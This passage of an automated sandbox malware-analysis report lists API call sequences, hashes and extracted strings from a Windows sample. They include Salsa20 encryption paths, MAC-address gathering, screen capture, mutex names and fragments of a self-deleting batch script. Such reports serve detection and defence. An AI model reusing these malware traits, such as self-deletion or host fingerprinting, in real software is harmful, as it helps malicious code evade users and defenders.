            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
            • String ID: %.2X
            • API String ID: 2451520719-213608013
            • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
            • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
            • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
            • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
            APIs
              • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
              • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
              • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
            • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
            • _memmove.LIBCMT ref: 0040F9EA
            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
            • _memmove.LIBCMT ref: 0040FADA
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
            • String ID:
            • API String ID: 273148273-0
            • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
            • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
            • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
            • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
            APIs
            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
            • __CxxThrowException@8.LIBCMT ref: 0040E8E4
              • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
            • __CxxThrowException@8.LIBCMT ref: 0040E90F
            • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
            • __CxxThrowException@8.LIBCMT ref: 0040E93E
            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
            • __CxxThrowException@8.LIBCMT ref: 0040E96F
            • _memset.LIBCMT ref: 0040E98E
            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
            • __CxxThrowException@8.LIBCMT ref: 0040E9B4
            • _sprintf.LIBCMT ref: 0040E9D3
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
            • String ID: %.2X
            • API String ID: 1084002244-213608013
            • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
            • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
            • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
            APIs
            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
            • __CxxThrowException@8.LIBCMT ref: 0040EB17
              • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
            • __CxxThrowException@8.LIBCMT ref: 0040EB42
            • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
            • __CxxThrowException@8.LIBCMT ref: 0040EB64
            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
            • __CxxThrowException@8.LIBCMT ref: 0040EB95
            • _memset.LIBCMT ref: 0040EBB4
            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
            • __CxxThrowException@8.LIBCMT ref: 0040EBDA
            • _sprintf.LIBCMT ref: 0040EBF4
            • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
            • String ID: %.2X
            • API String ID: 1637485200-213608013
            • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
            • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
            • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
            APIs
              • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
              • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
              • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
              • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
              • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
              • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
              • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
              • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
            • CreateCompatibleDC.GDI32(00000000), ref: 00482323
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
            • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
            • SelectObject.GDI32(00000000,00000000), ref: 0048235C
            • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
            • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
            • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
            • SelectObject.GDI32(?,?), ref: 00482436
            • DeleteObject.GDI32(00000000), ref: 0048243D
            • DeleteDC.GDI32(?), ref: 0048244A
            • DeleteDC.GDI32(?), ref: 00482450
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
            • String ID: .\crypto\rand\rand_win.c$DISPLAY
            • API String ID: 151064509-1805842116
            • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
            • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
            • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
            • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
            APIs
            • _malloc.LIBCMT ref: 0040E67F
              • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
              • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
              • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00760000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
            • _malloc.LIBCMT ref: 0040E68B
            • _wprintf.LIBCMT ref: 0040E69E
            • _free.LIBCMT ref: 0040E6A4
              • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
              • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
            • _free.LIBCMT ref: 0040E6C5
            • _malloc.LIBCMT ref: 0040E6CD
            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
            • _sprintf.LIBCMT ref: 0040E720
            • _wprintf.LIBCMT ref: 0040E732
            • _wprintf.LIBCMT ref: 0040E73C
            • _free.LIBCMT ref: 0040E745
            Strings
            • Address: %s, mac: %s, xrefs: 0040E72D
            • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
            • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
            • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
            • API String ID: 3901070236-1604013687
            • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
            • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
            • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
            • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
            APIs
              • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
              • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
              • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
            • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
            • _memmove.LIBCMT ref: 00410427
            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
            • _memmove.LIBCMT ref: 00410514
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
            • String ID:
            • API String ID: 273148273-0
            • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
            • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
            • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
            • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
            • String ID:
            • API String ID: 3232302685-0
            • Opcode ID: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
            • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
            • Opcode Fuzzy Hash: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
            • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
            APIs
            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: InfoLocale
            • String ID: ACP$OCP
            • API String ID: 2299586839-711371036
            • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
            • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
            • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
            • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
            APIs
            Strings
            • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
            • input != nullptr && output != nullptr, xrefs: 0040C095
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: __wassert
            • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
            • API String ID: 3993402318-1975116136
            • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
            • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
            • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
            • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
            APIs
            • CryptDestroyHash.ADVAPI32(?), ref: 00411190
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Crypt$ContextDestroyHashRelease
            • String ID:
            • API String ID: 3989222877-0
            • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
            • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
            • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
            • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
            APIs
            • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Crypt$ContextDestroyHashRelease
            • String ID:
            • API String ID: 3989222877-0
            • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
            • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
            • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
            • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
            APIs
            • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: Crypt$ContextDestroyHashRelease
            • String ID:
            • API String ID: 3989222877-0
            • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
            • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
            • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
            • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
            APIs
            • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: HeapProcess
            • String ID:
            • API String ID: 54951025-0
            • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
            • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
            • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
            • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
            APIs
            • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
            • GetLastError.KERNEL32 ref: 00412509
            • CloseHandle.KERNEL32 ref: 0041251C
            • CloseHandle.KERNEL32 ref: 00412539
            • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
            • GetLastError.KERNEL32 ref: 0041255B
            • CloseHandle.KERNEL32 ref: 0041256E
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: CloseHandle$CreateErrorLastMutex
            • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
            • API String ID: 2372642624-488272950
            • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
            • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
            • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
            • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
            APIs
            • GetLastError.KERNEL32 ref: 00411915
            • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
            • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
            • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
            • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
            • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
            • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
            • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
            • lstrcatW.KERNEL32(00000000,?), ref: 00411999
            • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
            • _memset.LIBCMT ref: 004119B8
            • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
              • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
            • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
            • String ID: failed with error
            • API String ID: 4182478520-946485432
            • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
            • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
            • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
            • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
            APIs
            • DecodePointer.KERNEL32 ref: 00427B29
            • _free.LIBCMT ref: 00427B42
              • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
              • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
            • _free.LIBCMT ref: 00427B55
            • _free.LIBCMT ref: 00427B73
            • _free.LIBCMT ref: 00427B85
            • _free.LIBCMT ref: 00427B96
            • _free.LIBCMT ref: 00427BA1
            • _free.LIBCMT ref: 00427BC5
            • EncodePointer.KERNEL32(00765248), ref: 00427BCC
            • _free.LIBCMT ref: 00427BE1
            • _free.LIBCMT ref: 00427BF7
            • _free.LIBCMT ref: 00427C1F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
            • String ID: HRv
            • API String ID: 3064303923-2955144885
            • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
            • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
            • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
            • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _strncmp
            • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
            • API String ID: 909875538-2733969777
            • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
            • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
            • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
            • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.2189872384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.2189872384.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
            • Associated: 00000002.00000002.2189872384.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_file.jbxd
            Yara matches
            Similarity
            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
            • String ID:
            • API String ID: 1503006713-0
            • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
